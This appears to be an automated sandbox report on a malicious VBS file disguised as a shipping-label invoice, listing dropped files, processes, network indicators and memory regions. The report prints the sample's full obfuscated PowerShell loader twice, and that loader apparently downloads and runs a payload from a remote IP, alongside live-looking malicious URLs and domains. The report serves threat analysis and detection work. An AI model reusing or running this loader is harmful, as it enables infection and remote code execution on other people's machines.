Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
awb_shipping_label_invoice_15_04_2024_000000000000024.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfegohga.obt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnhnnkbu.tuw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0o4hw3y.dz4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqdyebxh.wnv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Junkiens.Pro
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\awb_shipping_label_invoice_15_04_2024_000000000000024.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';Function
Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions;
$Staaltraadsnettet+=(3)){$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}function
Loggen($Darknesses){. ($Opisometer) ($Darknesses);}$Sniffles=Macrometeorology '.aMKooOvz.fiMilUnlbea v/.k5 M.Ps0B,
De(.oWB.isanAtd KoGrwTrsTy CoNToT o Tr1Cu0Ta.,n0Fo; rW,ai LnBa6 D4 ,;Sh TexWo6 B4 ,;M, SurRuvPe:Vo1Se2Fi1 R.,u0No),e ,nGFeeKacRuk
PoT / E2Ig0Ps1Ul0Fo0.m1R 0St1Op OF Hi OrZoeInf.noSex ,/Ab1.t2sa1Sp.,r0Pe ';$Rabiateste=Macrometeorology ' SUPhsSte Nr ,-
nASvgN,emenA.tT. ';$awiggle=Macrometeorology ' nhL.tUat ,pKr:Re/Ki/ f9Ch4L,.F 1 5Mo6Ba.S,7S,9Ba.Wi6Un4un/EnsR tT.rSky Kg
,eS,tVejCos .KvtH,hAfn.i>Veh et FtUnp F:.e/Fa/Ko1b,9ba3Pu. 2Ri2Du2D .Ch9Hi6 L.O,1To4Ca9,e/L sHitMar.pyBrg CePrtAfj,asSo.TrtInh
rnPr ';$Pteridophilism=Macrometeorology ' .>Mo ';$Opisometer=Macrometeorology 'aniL e .x.m ';$Fatningen = Macrometeorology
'IneT.c.hhVaoGe In%enaSppSkp.adSyaTatPraRe%Jo\unJRau Vn Gk GiH e RnMasC.. SPKar .oMo P.&Z &He Ope.ocInhPao l ,a$Se ';Loggen
(Macrometeorology 'Bi$ GgO,lMao,ab ,aKul.e: dHIny BlBsa BsTimSlu ,sB =Re(Rec Um DdDo C./ acBr .$seFdvaPrtPunRoiPanStgcee
LnH ) M ');Loggen (Macrometeorology 'An$ GgsklA,oAnb oa DlAm:Reb aPrcSmkUnf IiQulTals eRerEl=Ro$InaTawOri ,g CgMilReeDr.BlsdopN
lDoiAptA,(Ca$AfPH,tDreKarI.iSpdProdvp ,hBei.plthiInsTrmF.) K ');$awiggle=$backfiller[0];Loggen (Macrometeorology 'S,$GagT,l
SoDeb Fa.ul B: SKDuoStmYup seBon,asT,e BrS.eGlsFi=O N teElw F-A.O eb,aj.aeLacArtl cS ,yS,sF tSyeO mse.SqNGle,rtIn.EnW UeAnb
.CSil iBrenon TtJu ');Loggen (Macrometeorology 'Ta$ UKT.o nmEipG.eInnDrsStePer,re .sF..MuHSye,ua PdD,eFerKrsLa[Ra$ NRAdaSqb
Pibda ,tTreAtsHdtCre s]C.=Sa$ rSVenS iUdfR.fKvlFre HsSv ');$Kautionistens=Macrometeorology 'TeKFao FmBepFeefenKlsMieAsr Ces,si,.LeD
oInwStnCel.eoMaabidH,F TiSylAneRe( F$ aWow,iiT.g rg,mlFoeRe,Fo$MeC.vr LoAcf .tPae.prC.iNosLue K) a ';$Kautionistens=$Hylasmus[1]+$Kautionistens;$Crofterise=$Hylasmus[0];Loggen
(Macrometeorology ' S$RegK,lVeoEgb.uaHelT :EfsSwiRedDieB n.duD,mVim FeidrP,eA.tTesHa=S,(AlTTae,osRat .-.tPDea etSlh v Re$
.CStrBao PfAitAfeForChiIns.ie,a) ');while (!$sidenummerets) {Loggen (Macrometeorology 'p.$,og FlFyoOmb ,a,llOv:ViBK aRogHahAsaTavPhe
Ar ,1.a9Pi=Ma$,kt arFouU.e,h ') ;Loggen $Kautionistens;Loggen (Macrometeorology 'unSChtMaa yr,utfl- ESKol.ue GeThpA B,4D.
');Loggen (Macrometeorology 'Sv$FugN.lOpoudbInaPalKu: TsBaichd ,e enG,uSemPrmRue frD.eC tK.sLi= K(,hTRde.nsLetRe- GPMuaIntDehun
S.$.aCV r,uo,wfH.tLye,rrM i BsHye ,)Do ') ;Loggen (Macrometeorology 'M.$Stg PltroRobTaa ,l,n:SuOGuu.at .sSot OaArt OuDrrS.e.u=
.$Urg,ul.uoK bS aSalBu:SmILon.efThoPhrO mM.a ot FiraoTin UsAibCyeChhglaFenLad yl ii SnMogMie,lnZy+Ek+ .%Sk$Hab Ta.rcFok.pfSviKil
il MeMer,n.FocAnoInuTonBrtoc ') ;$awiggle=$backfiller[$Outstature];}Loggen (Macrometeorology 'Tr$Hjgunl,lo.ob Ca el .:EmU
CnSed e,urF.sOvtlutStt Ae AlUus DeEnsR,fBllP aprdMaeTesF. ,o=Ra UnG pe itIs-ReCKloM nP.tAceminFltHe A$SkCc.rU.oF f OtB,e,iri,iMis
ie.r ');Loggen (Macrometeorology ' F$sagBllWeoSubFla MlH : iNApy TtnotUnebop .lGaaCin StS.e ,sAn ne=fe N[ dSbuyUusHetR ePrm,c.StC
po,rnVevFoey r.atK,] s:,a:MoFHorM.o,am .B ma SsA e,l6Ha4SuSfat IrTaiKen.tgDi( e$OpU.unEpdNoeDirTesKatCutJ tDue Cl asPreFusAcfHjlN.aQud
meChsAf)Eq ');Loggen (Macrometeorology 'No$ ,gGalA,oM.bCoaOplAl:CrSHekeua,rtgotOveBitTirMeyP,kUn .= V Fo[ rST,ySns Kt,aeInm.e.SyT.oeGrx
.tAg.N.En nsccF,oT,dPyiSenF g P]Ka:,o: Ag SFlCTvICoI R.KaG.reKet S.yt .r IiMyn ag n(In$B NTryBytKatAfeRop alTraPanRat,ie
ds.p)Un ');Loggen (Macrometeorology 'S.$,egN lGeoHebNyaBal S:,iCQ.h TaThrVig SeFaaHjbNyl peMo=Hi$R SFek SaUft,yt Ve HtNar
,yulkCh.Uns.duPubPls,xtD,rlei enCag U(Be3Ar2Be0 .7Ve4Fa0F ,P 2Ru5R 7Re6F.1Pa) ');Loggen $Chargeable;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';Function
Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions;
$Staaltraadsnettet+=(3)){$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}function
Loggen($Darknesses){. ($Opisometer) ($Darknesses);}$Sniffles=Macrometeorology '.aMKooOvz.fiMilUnlbea v/.k5 M.Ps0B,
De(.oWB.isanAtd KoGrwTrsTy CoNToT o Tr1Cu0Ta.,n0Fo; rW,ai LnBa6 D4 ,;Sh TexWo6 B4 ,;M, SurRuvPe:Vo1Se2Fi1 R.,u0No),e ,nGFeeKacRuk
PoT / E2Ig0Ps1Ul0Fo0.m1R 0St1Op OF Hi OrZoeInf.noSex ,/Ab1.t2sa1Sp.,r0Pe ';$Rabiateste=Macrometeorology ' SUPhsSte Nr ,-
nASvgN,emenA.tT. ';$awiggle=Macrometeorology ' nhL.tUat ,pKr:Re/Ki/ f9Ch4L,.F 1 5Mo6Ba.S,7S,9Ba.Wi6Un4un/EnsR tT.rSky Kg
,eS,tVejCos .KvtH,hAfn.i>Veh et FtUnp F:.e/Fa/Ko1b,9ba3Pu. 2Ri2Du2D .Ch9Hi6 L.O,1To4Ca9,e/L sHitMar.pyBrg CePrtAfj,asSo.TrtInh
rnPr ';$Pteridophilism=Macrometeorology ' .>Mo ';$Opisometer=Macrometeorology 'aniL e .x.m ';$Fatningen = Macrometeorology
'IneT.c.hhVaoGe In%enaSppSkp.adSyaTatPraRe%Jo\unJRau Vn Gk GiH e RnMasC.. SPKar .oMo P.&Z &He Ope.ocInhPao l ,a$Se ';Loggen
(Macrometeorology 'Bi$ GgO,lMao,ab ,aKul.e: dHIny BlBsa BsTimSlu ,sB =Re(Rec Um DdDo C./ acBr .$seFdvaPrtPunRoiPanStgcee
LnH ) M ');Loggen (Macrometeorology 'An$ GgsklA,oAnb oa DlAm:Reb aPrcSmkUnf IiQulTals eRerEl=Ro$InaTawOri ,g CgMilReeDr.BlsdopN
lDoiAptA,(Ca$AfPH,tDreKarI.iSpdProdvp ,hBei.plthiInsTrmF.) K ');$awiggle=$backfiller[0];Loggen (Macrometeorology 'S,$GagT,l
SoDeb Fa.ul B: SKDuoStmYup seBon,asT,e BrS.eGlsFi=O N teElw F-A.O eb,aj.aeLacArtl cS ,yS,sF tSyeO mse.SqNGle,rtIn.EnW UeAnb
.CSil iBrenon TtJu ');Loggen (Macrometeorology 'Ta$ UKT.o nmEipG.eInnDrsStePer,re .sF..MuHSye,ua PdD,eFerKrsLa[Ra$ NRAdaSqb
Pibda ,tTreAtsHdtCre s]C.=Sa$ rSVenS iUdfR.fKvlFre HsSv ');$Kautionistens=Macrometeorology 'TeKFao FmBepFeefenKlsMieAsr Ces,si,.LeD
oInwStnCel.eoMaabidH,F TiSylAneRe( F$ aWow,iiT.g rg,mlFoeRe,Fo$MeC.vr LoAcf .tPae.prC.iNosLue K) a ';$Kautionistens=$Hylasmus[1]+$Kautionistens;$Crofterise=$Hylasmus[0];Loggen
(Macrometeorology ' S$RegK,lVeoEgb.uaHelT :EfsSwiRedDieB n.duD,mVim FeidrP,eA.tTesHa=S,(AlTTae,osRat .-.tPDea etSlh v Re$
.CStrBao PfAitAfeForChiIns.ie,a) ');while (!$sidenummerets) {Loggen (Macrometeorology 'p.$,og FlFyoOmb ,a,llOv:ViBK aRogHahAsaTavPhe
Ar ,1.a9Pi=Ma$,kt arFouU.e,h ') ;Loggen $Kautionistens;Loggen (Macrometeorology 'unSChtMaa yr,utfl- ESKol.ue GeThpA B,4D.
');Loggen (Macrometeorology 'Sv$FugN.lOpoudbInaPalKu: TsBaichd ,e enG,uSemPrmRue frD.eC tK.sLi= K(,hTRde.nsLetRe- GPMuaIntDehun
S.$.aCV r,uo,wfH.tLye,rrM i BsHye ,)Do ') ;Loggen (Macrometeorology 'M.$Stg PltroRobTaa ,l,n:SuOGuu.at .sSot OaArt OuDrrS.e.u=
.$Urg,ul.uoK bS aSalBu:SmILon.efThoPhrO mM.a ot FiraoTin UsAibCyeChhglaFenLad yl ii SnMogMie,lnZy+Ek+ .%Sk$Hab Ta.rcFok.pfSviKil
il MeMer,n.FocAnoInuTonBrtoc ') ;$awiggle=$backfiller[$Outstature];}Loggen (Macrometeorology 'Tr$Hjgunl,lo.ob Ca el .:EmU
CnSed e,urF.sOvtlutStt Ae AlUus DeEnsR,fBllP aprdMaeTesF. ,o=Ra UnG pe itIs-ReCKloM nP.tAceminFltHe A$SkCc.rU.oF f OtB,e,iri,iMis
ie.r ');Loggen (Macrometeorology ' F$sagBllWeoSubFla MlH : iNApy TtnotUnebop .lGaaCin StS.e ,sAn ne=fe N[ dSbuyUusHetR ePrm,c.StC
po,rnVevFoey r.atK,] s:,a:MoFHorM.o,am .B ma SsA e,l6Ha4SuSfat IrTaiKen.tgDi( e$OpU.unEpdNoeDirTesKatCutJ tDue Cl asPreFusAcfHjlN.aQud
meChsAf)Eq ');Loggen (Macrometeorology 'No$ ,gGalA,oM.bCoaOplAl:CrSHekeua,rtgotOveBitTirMeyP,kUn .= V Fo[ rST,ySns Kt,aeInm.e.SyT.oeGrx
.tAg.N.En nsccF,oT,dPyiSenF g P]Ka:,o: Ag SFlCTvICoI R.KaG.reKet S.yt .r IiMyn ag n(In$B NTryBytKatAfeRop alTraPanRat,ie
ds.p)Un ');Loggen (Macrometeorology 'S.$,egN lGeoHebNyaBal S:,iCQ.h TaThrVig SeFaaHjbNyl peMo=Hi$R SFek SaUft,yt Ve HtNar
,yulkCh.Uns.duPubPls,xtD,rlei enCag U(Be3Ar2Be0 .7Ve4Fa0F ,P 2Ru5R 7Re6F.1Pa) ');Loggen $Chargeable;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Junkiens.Pro && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Junkiens.Pro && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://94.156.79.64/ZtoOstiFBXtBvORCuTFplvl84.bin
|
94.156.79.64
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://193.222.96.149/strygetjs.thn
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://94.156.79.64/strygetjs.thn
|
94.156.79.64
|
||
|
http://94.156.79.64
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iwarsut775laudrye2.duckdns.org
|
193.222.96.11
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
geoplugin.net
|
178.237.33.50
|
||
|
jawapharmaceuticals.com
|
158.106.139.211
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.156.79.64
|
unknown
|
Bulgaria
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1F710069000
|
trusted library allocation
|
page read and write
|
|
|
|
5D4B000
|
trusted library allocation
|
page read and write
|
|
|
|
8A30000
|
direct allocation
|
page execute and read and write
|
|
|
|
6AC6000
|
remote allocation
|
page execute and read and write
|
|
|
|
BAB6000
|
direct allocation
|
page execute and read and write
|
|
|
|
7FF887D00000
|
trusted library allocation
|
page read and write
|
||
|
1F769E90000
|
heap
|
page read and write
|
||
|
1F76C110000
|
trusted library allocation
|
page read and write
|
||
|
1F76C2A1000
|
heap
|
page read and write
|
||
|
7618000
|
trusted library allocation
|
page read and write
|
||
|
7FF887CA0000
|
trusted library allocation
|
page read and write
|
||
|
7787000
|
trusted library allocation
|
page read and write
|
||
|
7FF887C50000
|
trusted library allocation
|
page read and write
|
||
|
32E5000
|
trusted library allocation
|
page execute and read and write
|
||
|
8A60000
|
direct allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7630000
|
heap
|
page execute and read and write
|
||
|
6F6E000
|
stack
|
page read and write
|
||
|
1F76BEB7000
|
heap
|
page execute and read and write
|
||
|
24F70F48000
|
heap
|
page read and write
|
||
|
1F701D70000
|
trusted library allocation
|
page read and write
|
||
|
1F769E40000
|
heap
|
page read and write
|
||
|
24F710E2000
|
heap
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
24F70B1F000
|
heap
|
page read and write
|
||
|
1F700001000
|
trusted library allocation
|
page read and write
|
||
|
24F707F5000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
1F13BB45000
|
heap
|
page read and write
|
||
|
5442000
|
trusted library allocation
|
page read and write
|
||
|
75B3000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
79A0000
|
trusted library allocation
|
page read and write
|
||
|
D4D61FF000
|
stack
|
page read and write
|
||
|
723D000
|
stack
|
page read and write
|
||
|
1F70046E000
|
trusted library allocation
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
707B000
|
stack
|
page read and write
|
||
|
8A50000
|
direct allocation
|
page read and write
|
||
|
24F71440000
|
heap
|
page read and write
|
||
|
7FF887C20000
|
trusted library allocation
|
page read and write
|
||
|
32E2000
|
trusted library allocation
|
page read and write
|
||
|
8540000
|
trusted library allocation
|
page read and write
|
||
|
1F13B800000
|
heap
|
page read and write
|
||
|
1F76B8C0000
|
heap
|
page execute and read and write
|
||
|
9150000
|
direct allocation
|
page execute and read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
24F70AE1000
|
heap
|
page read and write
|
||
|
1F7102F2000
|
trusted library allocation
|
page read and write
|
||
|
24F70F20000
|
heap
|
page read and write
|
||
|
1F769E80000
|
heap
|
page read and write
|
||
|
876C000
|
stack
|
page read and write
|
||
|
1F769EE0000
|
trusted library section
|
page read and write
|
||
|
1F76C28F000
|
heap
|
page read and write
|
||
|
43918CE000
|
stack
|
page read and write
|
||
|
8A90000
|
direct allocation
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
1F769F42000
|
heap
|
page read and write
|
||
|
1F76C013000
|
heap
|
page read and write
|
||
|
7FF887CB0000
|
trusted library allocation
|
page read and write
|
||
|
6EAE000
|
stack
|
page read and write
|
||
|
1F769E85000
|
heap
|
page read and write
|
||
|
24F70F20000
|
heap
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
89F0000
|
trusted library allocation
|
page read and write
|
||
|
D4D5D7D000
|
stack
|
page read and write
|
||
|
3470000
|
trusted library allocation
|
page read and write
|
||
|
24F715D9000
|
heap
|
page read and write
|
||
|
8515000
|
trusted library allocation
|
page read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
7610000
|
trusted library allocation
|
page read and write
|
||
|
5D45000
|
trusted library allocation
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
5472000
|
trusted library allocation
|
page read and write
|
||
|
7FF8879BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7FF887D20000
|
trusted library allocation
|
page read and write
|
||
|
D4D60FE000
|
unkown
|
page read and write
|
||
|
60C6000
|
remote allocation
|
page execute and read and write
|
||
|
924E000
|
stack
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
848F000
|
stack
|
page read and write
|
||
|
24F707D3000
|
heap
|
page read and write
|
||
|
1F76B920000
|
trusted library allocation
|
page read and write
|
||
|
7F4F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CEB6000
|
direct allocation
|
page execute and read and write
|
||
|
32E0000
|
trusted library allocation
|
page read and write
|
||
|
83C0000
|
trusted library allocation
|
page read and write
|
||
|
784E000
|
stack
|
page read and write
|
||
|
1F76BEC0000
|
heap
|
page read and write
|
||
|
9570000
|
heap
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
1F76BEB0000
|
heap
|
page execute and read and write
|
||
|
9200000
|
heap
|
page read and write
|
||
|
7FF887A60000
|
trusted library allocation
|
page read and write
|
||
|
3290000
|
trusted library section
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
4390E7E000
|
stack
|
page read and write
|
||
|
24F708E1000
|
heap
|
page read and write
|
||
|
24F70F42000
|
heap
|
page read and write
|
||
|
1F769E50000
|
heap
|
page read and write
|
||
|
7DF499B30000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F6E8B0000
|
remote allocation
|
page read and write
|
||
|
335E000
|
stack
|
page read and write
|
||
|
4390D7E000
|
stack
|
page read and write
|
||
|
7FF887BF0000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F71434000
|
heap
|
page read and write
|
||
|
86EB000
|
stack
|
page read and write
|
||
|
8387000
|
stack
|
page read and write
|
||
|
1F76BF90000
|
heap
|
page read and write
|
||
|
7FF887CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF887B50000
|
trusted library allocation
|
page read and write
|
||
|
87AE000
|
heap
|
page read and write
|
||
|
1F13B7B0000
|
heap
|
page read and write
|
||
|
1F769EF0000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
88C6000
|
remote allocation
|
page execute and read and write
|
||
|
33C8000
|
trusted library allocation
|
page read and write
|
||
|
1F76C010000
|
heap
|
page read and write
|
||
|
341C000
|
stack
|
page read and write
|
||
|
6EE0000
|
heap
|
page execute and read and write
|
||
|
6EE5000
|
heap
|
page execute and read and write
|
||
|
2B2D000
|
stack
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
2FE7000
|
heap
|
page read and write
|
||
|
1F76B870000
|
trusted library allocation
|
page read and write
|
||
|
32B0000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
5AC9000
|
trusted library allocation
|
page read and write
|
||
|
757D000
|
heap
|
page read and write
|
||
|
7FF887B6A000
|
trusted library allocation
|
page read and write
|
||
|
755A000
|
heap
|
page read and write
|
||
|
7FF887AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
9270000
|
heap
|
page read and write
|
||
|
24F70F48000
|
heap
|
page read and write
|
||
|
78E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
9250000
|
heap
|
page read and write
|
||
|
1F769F7A000
|
heap
|
page read and write
|
||
|
844D000
|
stack
|
page read and write
|
||
|
24F71430000
|
heap
|
page read and write
|
||
|
3300000
|
trusted library allocation
|
page read and write
|
||
|
24F70ED4000
|
heap
|
page read and write
|
||
|
872D000
|
stack
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
77B0000
|
trusted library allocation
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
1F76BF69000
|
heap
|
page read and write
|
||
|
75D1000
|
heap
|
page read and write
|
||
|
1F7011A6000
|
trusted library allocation
|
page read and write
|
||
|
8AA0000
|
direct allocation
|
page read and write
|
||
|
866C000
|
stack
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
24F71448000
|
heap
|
page read and write
|
||
|
1F76B8E0000
|
heap
|
page read and write
|
||
|
8A80000
|
direct allocation
|
page read and write
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
3460000
|
trusted library allocation
|
page execute and read and write
|
||
|
4390A7D000
|
stack
|
page read and write
|
||
|
7FF887A6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
32A0000
|
trusted library allocation
|
page read and write
|
||
|
1F769F32000
|
heap
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
79FB000
|
stack
|
page read and write
|
||
|
24F70CE8000
|
heap
|
page read and write
|
||
|
7FF887C80000
|
trusted library allocation
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
7750000
|
trusted library allocation
|
page read and write
|
||
|
24F71611000
|
heap
|
page read and write
|
||
|
7FF8879B0000
|
trusted library allocation
|
page read and write
|
||
|
1F701BFF000
|
trusted library allocation
|
page read and write
|
||
|
1F76BF11000
|
heap
|
page read and write
|
||
|
7FF887BD0000
|
trusted library allocation
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
8A70000
|
direct allocation
|
page read and write
|
||
|
1F76C113000
|
trusted library allocation
|
page read and write
|
||
|
24F70EAC000
|
heap
|
page read and write
|
||
|
24F70F49000
|
heap
|
page read and write
|
||
|
717A000
|
stack
|
page read and write
|
||
|
2EAC000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
24F71601000
|
heap
|
page read and write
|
||
|
780E000
|
stack
|
page read and write
|
||
|
24F7142C000
|
heap
|
page read and write
|
||
|
1F76C287000
|
heap
|
page read and write
|
||
|
32B4000
|
trusted library allocation
|
page read and write
|
||
|
1F76C2E1000
|
heap
|
page read and write
|
||
|
1F76B8D0000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
C4B6000
|
direct allocation
|
page execute and read and write
|
||
|
1F769F84000
|
heap
|
page read and write
|
||
|
24F717DA000
|
heap
|
page read and write
|
||
|
9278000
|
heap
|
page read and write
|
||
|
71C0000
|
direct allocation
|
page read and write
|
||
|
24F715F9000
|
heap
|
page read and write
|
||
|
7FF8879CB000
|
trusted library allocation
|
page read and write
|
||
|
32B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F6E943000
|
heap
|
page read and write
|
||
|
24F70E83000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
24F71281000
|
heap
|
page read and write
|
||
|
2F8F000
|
stack
|
page read and write
|
||
|
5AA1000
|
trusted library allocation
|
page read and write
|
||
|
24F71609000
|
heap
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
31C1000
|
heap
|
page read and write
|
||
|
7EC6000
|
remote allocation
|
page execute and read and write
|
||
|
1F13B80D000
|
heap
|
page read and write
|
||
|
1F70062D000
|
trusted library allocation
|
page read and write
|
||
|
43909FE000
|
stack
|
page read and write
|
||
|
7FF887BB0000
|
trusted library allocation
|
page read and write
|
||
|
24F70FAD000
|
heap
|
page read and write
|
||
|
87DB000
|
heap
|
page read and write
|
||
|
8400000
|
heap
|
page read and write
|
||
|
1F710001000
|
trusted library allocation
|
page read and write
|
||
|
1F76C297000
|
heap
|
page read and write
|
||
|
77AA000
|
trusted library allocation
|
page read and write
|
||
|
1F769EFB000
|
heap
|
page read and write
|
||
|
322D000
|
heap
|
page read and write
|
||
|
1F76B960000
|
heap
|
page read and write
|
||
|
703D000
|
stack
|
page read and write
|
||
|
33AE000
|
stack
|
page read and write
|
||
|
862E000
|
stack
|
page read and write
|
||
|
7190000
|
direct allocation
|
page read and write
|
||
|
439097E000
|
